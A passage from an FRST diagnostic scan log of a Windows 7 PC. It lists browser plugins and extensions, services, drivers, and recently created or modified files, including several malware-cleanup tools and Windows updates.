FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Reader 3\npnitromozilla.dll (Nitro PDF)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-01-12]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://mysearch.avg.com?cid={C5A5FB70-D1E9-4A53-A320-CCB386C446A5}&mid=02c46f78a88847d0bb19e929310f541b-671ef39aac1444e99a49d5d3d7f7fe13e79e8395&lang=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-06-13 12:39:30&v=18.1.0.443&pid=safeguard&sg=&sap=hp"
CHR Profile: C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-06-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-12]
CHR Extension: (Google Wallet) - C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-12]
CHR HKLM-x32\...\Chrome\Extension: [fplhdcjmbpfkejbhngmlngaecbjmoimd] - C:\Program Files\AVAST Software\Avast\AdBlocker\Chrome\avast-adblocker-chrome.crx []
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-07-21]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S2 appdrvrem01; C:\Windows\System32\appdrvrem01.exe [551896 2012-03-12] (Protection Technology)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-07-21] (AVAST Software)
R2 GFNEXSrv; C:\Windows\System32\GFNEXSrv.exe [162824 2010-09-09] ()
R2 NitroReaderDriverReadSpool3; C:\Program Files\Common Files\Nitro\Reader\3.0\NitroPDFReaderDriverService3x64.exe [230416 2013-06-18] (Nitro PDF Software)
R2 Norton PC Checkup Application Launcher; C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe [132504 2013-10-20] (Symantec Corporation)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [126392 2011-07-19] (Symantec Corporation)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 appdrv01; C:\Windows\System32\Drivers\appdrv01.sys [3854000 2012-03-12] (Protection Technology)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-07-21] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [79184 2014-07-21] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-07-21] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-07-21] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1041168 2014-07-21] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [427360 2014-07-21] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [92008 2014-07-21] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [224896 2014-07-21] ()
S3 ssmirrdr; C:\Windows\System32\DRIVERS\ssmirrdr.sys [10112 2011-03-15] (support.com, Inc)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-10 19:52 - 2014-11-10 19:52 - 00000911 _____ () C:\Users\My Computer\Desktop\JRT.txt
2014-11-10 19:46 - 2014-11-10 19:46 - 00000000 ____D () C:\windows\ERUNT
2014-11-10 19:44 - 2014-11-10 19:44 - 01706808 _____ (Thisisu) C:\Users\My Computer\Desktop\JRT.exe
2014-11-10 19:41 - 2014-11-10 19:42 - 00008837 _____ () C:\Users\My Computer\Desktop\AdwCleaner[S0].txt
2014-11-10 19:36 - 2014-11-10 19:39 - 00000000 ____D () C:\AdwCleaner
2014-11-10 19:36 - 2014-11-10 19:36 - 02140160 _____ () C:\Users\My Computer\Downloads\AdwCleaner.exe
2014-11-10 19:35 - 2014-11-10 19:35 - 00017862 _____ () C:\Users\My Computer\Desktop\download (1).htm
2014-11-10 19:31 - 2014-11-10 19:31 - 00299130 _____ () C:\Users\My Computer\Desktop\ESETPoweliksCleaner.exe_20141110.193116.4816.log
2014-11-10 19:26 - 2014-11-10 19:26 - 00186568 _____ (ESET) C:\Users\My Computer\Desktop\ESETPoweliksCleaner.exe
2014-11-10 18:56 - 2014-11-10 18:56 - 00002355 _____ () C:\Users\My Computer\Desktop\aswMBR.txt
2014-11-10 18:56 - 2014-11-10 18:56 - 00000512 _____ () C:\Users\My Computer\Desktop\MBR.dat
2014-11-10 18:34 - 2014-11-10 18:34 - 00027532 _____ () C:\Users\My Computer\Desktop\Addition.txt
2014-11-10 18:33 - 2014-11-10 20:03 - 00018372 _____ () C:\Users\My Computer\Desktop\FRST.txt
2014-11-10 18:32 - 2014-11-10 18:06 - 05194752 _____ (AVAST Software) C:\Users\My Computer\Desktop\aswMBR.exe
2014-11-10 18:32 - 2014-11-10 17:58 - 02116096 _____ (Farbar) C:\Users\My Computer\Desktop\FRST64.exe
2014-11-10 18:06 - 2014-11-10 18:06 - 05194752 _____ (AVAST Software) C:\Users\My Computer\Downloads\aswMBR.exe
2014-11-10 18:02 - 2014-11-10 18:14 - 00028065 _____ () C:\Users\My Computer\Downloads\Addition.txt
2014-11-10 18:00 - 2014-11-10 20:03 - 00000000 ____D () C:\FRST
2014-11-10 18:00 - 2014-11-10 18:29 - 00017669 _____ () C:\Users\My Computer\Downloads\FRST.txt
2014-11-10 17:58 - 2014-11-10 17:58 - 02116096 _____ (Farbar) C:\Users\My Computer\Downloads\FRST64.exe
2014-11-10 17:57 - 2014-11-10 17:57 - 00017782 _____ () C:\Users\My Computer\Desktop\download.htm
2014-11-10 17:55 - 2014-11-10 17:55 - 00000207 _____ () C:\windows\tweaking.com-regbackup-MYCOMPUTER-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-11-10 17:52 - 2014-11-10 17:52 - 00000000 ____D () C:\RegBackup
2014-11-10 17:51 - 2014-11-10 17:51 - 00325960 _____ () C:\Users\My Computer\Desktop\lua5.1.dll
2014-11-10 17:51 - 2014-11-10 17:51 - 00001567 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\Users\My Computer\Desktop\Uninstall
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\Users\My Computer\Desktop\files
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\Users\My Computer\Desktop\color_presets
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-11-10 17:50 - 2014-11-10 17:50 - 04215584 _____ () C:\Users\My Computer\Downloads\tweaking.com_registry_backup_setup.exe
2014-11-10 17:46 - 2014-11-10 17:49 - 00000000 ____D () C:\Users\My Computer\Desktop\New folder (3)
2014-11-09 23:33 - 2014-11-09 23:39 - 122307832 _____ (Microsoft Corporation) C:\Users\My Computer\Downloads\msert.exe
2014-11-09 03:24 - 2009-06-10 16:00 - 00000824 _____ () C:\windows\system32\Drivers\etc\hosts.20141109-032450.backup
2014-11-09 02:10 - 2014-11-09 02:10 - 00068328 _____ () C:\Users\My Computer\AppData\Local\GDIPFONTCACHEV1.DAT
2014-11-09 02:07 - 2014-11-10 19:40 - 00002354 _____ () C:\windows\PFRO.log
2014-11-09 02:07 - 2014-11-09 02:08 - 00303648 _____ () C:\windows\system32\FNTCACHE.DAT
2014-11-09 00:42 - 2014-11-10 19:41 - 00000448 _____ () C:\windows\setupact.log
2014-11-09 00:42 - 2014-11-09 00:42 - 00000000 _____ () C:\windows\setuperr.log
2014-11-08 20:26 - 2014-11-10 18:18 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-11-06 20:50 - 2014-11-06 20:50 - 00001362 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-11-06 20:50 - 2014-11-06 20:50 - 00001350 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-11-06 20:50 - 2014-11-06 20:50 - 00000656 _____ () C:\windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2014-11-06 20:50 - 2014-11-06 20:50 - 00000628 _____ () C:\windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2014-11-06 20:50 - 2014-11-06 20:50 - 00000458 _____ () C:\windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2014-11-06 20:50 - 2014-11-06 20:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-11-06 20:49 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\windows\system32\sdnclean64.exe
2014-11-06 20:46 - 2014-11-06 20:49 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\My Computer\Downloads\spybot-2.4.exe
2014-11-04 23:10 - 2014-11-04 23:10 - 00000460 _____ () C:\Users\My Computer\Documents\cc_20141104_231029.reg
2014-11-04 17:22 - 2014-11-10 19:45 - 00211763 _____ () C:\windows\WindowsUpdate.log
2014-11-03 19:24 - 2014-11-03 19:24 - 00188487 _____ () C:\Users\My Computer\Downloads\Rustbelt_Middle_Values_Only_10.23.14.xlsx
2014-10-22 11:49 - 2014-10-22 11:49 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (4).xls
2014-10-22 11:38 - 2014-10-22 11:38 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (3).xls
2014-10-22 11:31 - 2014-10-22 11:31 - 00066048 _____ () C:\Users\My Computer\Downloads\UP3477WS3 (2).xls
2014-10-22 11:30 - 2014-10-22 11:30 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (2).xls
2014-10-22 11:03 - 2014-10-22 11:03 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (4).xls
2014-10-22 11:03 - 2014-10-22 11:03 - 00070144 _____ () C:\Users\My Computer\Downloads\UP3477WS9 (1).xls
2014-10-22 11:02 - 2014-10-22 11:02 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (3).xls
2014-10-22 11:02 - 2014-10-22 11:02 - 00066048 _____ () C:\Users\My Computer\Downloads\UP3477WS3 (1).xls
2014-10-22 11:02 - 2014-10-22 11:02 - 00065536 _____ () C:\Users\My Computer\Downloads\UP3477WS11.xls
2014-10-22 11:01 - 2014-10-22 11:01 - 00067584 _____ () C:\Users\My Computer\Downloads\UP3477WS6 (2).xls
2014-10-22 11:01 - 2014-10-22 11:01 - 00067584 _____ () C:\Users\My Computer\Downloads\UP3477WS6 (1).xls
2014-10-22 11:01 - 2014-10-22 11:01 - 00061952 _____ () C:\Users\My Computer\Downloads\UP3477WS8.xls
2014-10-22 11:00 - 2014-10-22 11:00 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (1).xls
2014-10-22 10:58 - 2014-10-22 10:58 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (2).xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (1).xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00070144 _____ () C:\Users\My Computer\Downloads\UP3477WS9.xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00066048 _____ () C:\Users\My Computer\Downloads\UP3477WS3.xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00024576 _____ () C:\Users\My Computer\Downloads\UP3477WS7.xls
2014-10-22 10:55 - 2014-10-22 10:55 - 04991400 _____ (Adobe Systems Inc.) C:\Users\My Computer\Downloads\Shockwave_Installer_Slim (1).exe
2014-10-22 10:54 - 2014-10-22 10:54 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2.xls
2014-10-22 10:51 - 2014-10-22 10:51 - 04991400 _____ (Adobe Systems Inc.) C:\Users\My Computer\Downloads\Shockwave_Installer_Slim.exe
2014-10-22 10:51 - 2014-10-22 10:51 - 00000000 ____D () C:\windows\SysWOW64\Adobe
2014-10-22 10:49 - 2014-10-22 10:49 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5.xls
2014-10-22 10:48 - 2014-10-22 10:48 - 00067584 _____ () C:\Users\My Computer\Downloads\UP3477WS6.xls
2014-10-18 15:29 - 2014-10-18 15:29 - 00011206 _____ () C:\Users\My Computer\Documents\cc_20141018_162905.reg
2014-10-15 06:15 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-10-15 06:15 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2014-10-15 06:15 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-10-15 06:15 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-15 06:15 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2014-10-15 06:15 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-15 06:15 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2014-10-15 06:15 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2014-10-15 06:15 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2014-10-15 06:15 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2014-10-15 06:15 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2014-10-15 06:15 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-15 06:15 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-15 06:15 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-15 06:15 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-10-15 06:15 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2014-10-15 06:15 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-15 06:15 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-10-15 06:15 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-15 06:15 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-10-15 06:15 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-10-15 06:15 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-15 06:15 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-15 06:15 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-15 06:15 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-15 06:15 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-10-15 06:15 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2014-10-15 06:15 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-10-15 06:15 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-10-15 06:15 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-10-15 06:15 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2014-10-15 06:15 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-15 06:15 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 06:15 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\windows\SysWOW64\vbscript.dll
2014-10-15 06:15 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-15 06:15 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2014-10-15 06:15 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieetwproxystub.dll
2014-10-15 06:15 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-15 06:15 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\MshtmlDac.dll
2014-10-15 06:15 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-15 06:15 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2014-10-15 06:15 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2014-10-15 06:15 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2014-10-15 06:15 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll
2014-10-15 06:15 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieUnatt.exe
2014-10-15 06:15 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9diag.dll
2014-10-15 06:15 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-15 06:15 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-15 06:15 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-10-15 06:15 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 06:15 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-15 06:15 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2014-10-15 06:15 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2014-10-15 06:15 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmlmedia.dll
2014-10-15 06:15 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-15 06:15 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2014-10-15 06:15 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-10-15 06:15 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2014-10-15 06:15 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieapfltr.dll
2014-10-15 06:14 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDYAK.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDTAT.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDRU1.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDBASH.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDRU.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDYAK.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDTAT.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU1.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDBASH.DLL
2014-10-15 06:13 - 2014-07-08 17:38 - 00419992 _____ () C:\windows\system32\locale.nls
2014-10-15 06:13 - 2014-07-08 17:30 - 00419992 _____ () C:\windows\SysWOW64\locale.nls
2014-10-15 06:13 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\SysWOW64\dfshim.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscorier.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscories.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-15 06:04 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-10-15 06:04 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll
2014-10-15 06:04 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-15 06:04 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll
2014-10-15 06:04 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-15 06:04 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe
2014-10-15 06:04 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-15 06:04 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-15 06:04 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe
2014-10-15 06:04 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\windows\SysWOW64\aaclient.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll
2014-10-15 06:04 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-15 06:04 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-14 20:26 - 2014-10-14 20:27 - 00937005 _____ () C:\Users\My Computer\Downloads\Attachments_20141014 (1).zip
2014-10-14 20:24 - 2014-10-14 20:24 - 03465946 _____ () C:\Users\My Computer\Downloads\Attachments_20141014.zip
2014-10-12 07:47 - 2014-10-12 07:48 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-12 07:47 - 2014-10-12 07:47 - 00001990 _____ () C:\Users\Public\Desktop\Adobe Reader XI.lnk
2014-10-12 07:47 - 2014-10-12 07:47 - 00000000 ____D () C:\Program Files (x86)\Adobe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-10 19:49 - 2009-07-14 00:13 - 00782510 _____ () C:\windows\system32\PerfStringBackup.INI
2014-11-10 19:49 - 2009-07-13 23:45 - 00024608 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-10 19:49 - 2009-07-13 23:45 - 00024608 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-10 19:41 - 2013-09-24 08:33 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-10 19:41 - 2009-07-14 00:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-11-10 19:30 - 2014-01-12 14:04 - 00004182 _____ () C:\windows\System32\Tasks\avast! Emergency Update
2014-11-10 19:24 - 2014-01-23 16:02 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-11-10 19:24 - 2013-09-24 08:33 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-10 17:55 - 2012-05-17 22:51 - 00000679 _____ () C:\Users\My Computer\Desktop\Settings.ini
2014-11-10 17:49 - 2014-10-10 11:37 - 00000000 ____D () C:\Users\My Computer\Desktop\New folder (2)
2014-11-09 00:05 - 2012-04-04 13:08 - 00000000 ____D () C:\Users\My Computer\AppData\Local\CrashDumps
2014-11-09 00:05 - 2012-03-18 21:01 - 00000000 ____D () C:\windows\Minidump
2014-11-08 23:31 - 2012-04-06 16:59 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-11-08 03:47 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\NDF
2014-11-06 20:54 - 2014-06-12 08:25 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
